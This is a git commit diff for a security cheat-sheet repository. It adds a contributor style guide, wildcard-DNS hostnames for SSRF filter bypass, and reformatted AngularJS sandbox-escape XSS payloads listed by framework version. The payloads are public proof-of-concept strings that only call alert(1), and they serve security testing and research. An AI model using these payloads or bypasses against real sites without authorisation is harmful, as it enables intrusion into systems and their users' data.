Merge pull request #2 from EdOverflow/master

Syncing
2024-11-25 12:30:19 +00:00 · 2017-07-17 17:44:08 +03:00 · 2017-07-17 17:44:08 +03:00 · a20e51a3ff
commit a20e51a3ff
parent 9b3073a717 b8aab1ccde
4 changed files with 77 additions and 16 deletions
--- a/README.md
+++ b/README.md
@ -28,6 +28,16 @@ Our bug tracker utilizes several labels to help organize and identify issues.

 Use the GitHub issue search — check if the issue has already been reported.

+# Style Guide
+
+We like to keep our Markdown files as uniform as possible. So if you submit a PR make sure to follow this style guide (We will not be angry if you do not.)
+
+- Cheat sheet titles should start with `##`.
+- Subheadings should be made bold. (`**Subheading**`)
+- Add newlines after subheadings and code blocks.
+- Code blocks should use three backticks. (```)
+- Make sure to use syntax highlighting whenever possible.
+
 # Contributors

 - [EdOverflow](https://github.com/EdOverflow)
--- a/cheatsheets/open-redirect.md
+++ b/cheatsheets/open-redirect.md
@ -7,6 +7,7 @@
 ```
 /%5cgoogle.com
 ```
+
 ```
 //www.google.com/%2f%2e%2e
 ```
--- a/cheatsheets/ssrf.md
+++ b/cheatsheets/ssrf.md
@ -28,4 +28,24 @@ http://[::1]

 ```
 http://[::]
-```
+```
+
+**Wildcard DNS**
+
+```
+10.0.0.1.xip.io
+www.10.0.0.1.xip.io
+mysite.10.0.0.1.xip.io
+foo.bar.10.0.0.1.xip.io
+```
+_Link:_ http://xip.io
+
+```
+10.0.0.1.nip.io maps
+app.10.0.0.1.nip.io
+customer1.app.10.0.0.1.nip.io
+customer2.app.10.0.0.1.nip.io
+otherapp.10.0.0.1.nip.io
+```
+
+_Link:_ http://nip.io
--- a/cheatsheets/xss.md
+++ b/cheatsheets/xss.md
@ -62,33 +62,46 @@ javas&#x09;cript://www.google.com/%0Aalert(1)
 [a](javascript://www.google.com%0Aprompt(1))
 ```

-## AngularJS Template Injection based XSS
+**AngularJS Template Injection based XSS**

 **1.0.1 - 1.1.5** by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
-```
+
+```js
 {{constructor.constructor('alert(1)')()}}
 ```
+
 **1.2.0 - 1.2.1** by [Jan Horn (Google)](https://twitter.com/tehjh)
-```
+
+```js
 {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
 ```
+
 **1.2.2 - 1.2.5** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
-```
+
+```js
 {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
 ```
+
 **1.2.6 - 1.2.18** by [Jan Horn (Google)](https://twitter.com/tehjh)
-```
+
+```js
 {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
 ```
+
 **1.2.19 - 1.2.23** by [Mathias Karlsson](https://twitter.com/avlidienbrunn)
-```
+
+```js
 {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
 ```
+
 **1.2.24 - 1.2.29** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
-```
+
+```js
 {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
 ```
+
 **1.3.0** by [Gábor Molnár (Google)](https://twitter.com/molnar_g)
+
 ```
 {{!ready && (ready = true) && (
      !call
@ -105,42 +118,57 @@ javas&#x09;cript://www.google.com/%0Aalert(1)
        ))
    );}}
 ```
+
 **1.3.1 - 1.3.2** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
-```
+
+```js
 {{
    {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
    'a'.constructor.prototype.charAt=''.valueOf; 
    $eval('x=alert(1)//'); 
 }}
 ```
+
 **1.3.3 - 1.3.18** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
-```
+
+```js
 {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 

  'a'.constructor.prototype.charAt=[].join;
  $eval('x=alert(1)//');  }}
 ```
+
 **1.3.19** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
-```
+
+```js
 {{
    'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; 
    $eval('x=alert(1)//'); 
 }}
+
 ```
+
 **1.3.20** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
-```
+
+```js
 {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
 ```
+
 **1.4.0 - 1.4.9** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
-```
+
+```js
 {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
 ```
+
 **1.5.0 - 1.5.8** by [Ian Hickey](https://twitter.com/ianhickey1024)
-```
+
+```js
 {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
 ```
+
 **1.5.9 - 1.5.11** by [Jan Horn (Google)](https://twitter.com/tehjh)
-```
+
+```js
 {{
    c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
    c.$apply=$apply;c.$eval=b;op=$root.$$phase;
@ -156,7 +184,9 @@ javas&#x09;cript://www.google.com/%0Aalert(1)
    $eval('a(b.c)');[].push.apply=a;
 }}
 ```
+
 **1.6.0+** (no Sandbox) by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
-```
+
+```js
 {{constructor.constructor('alert(1)')()}}
 ```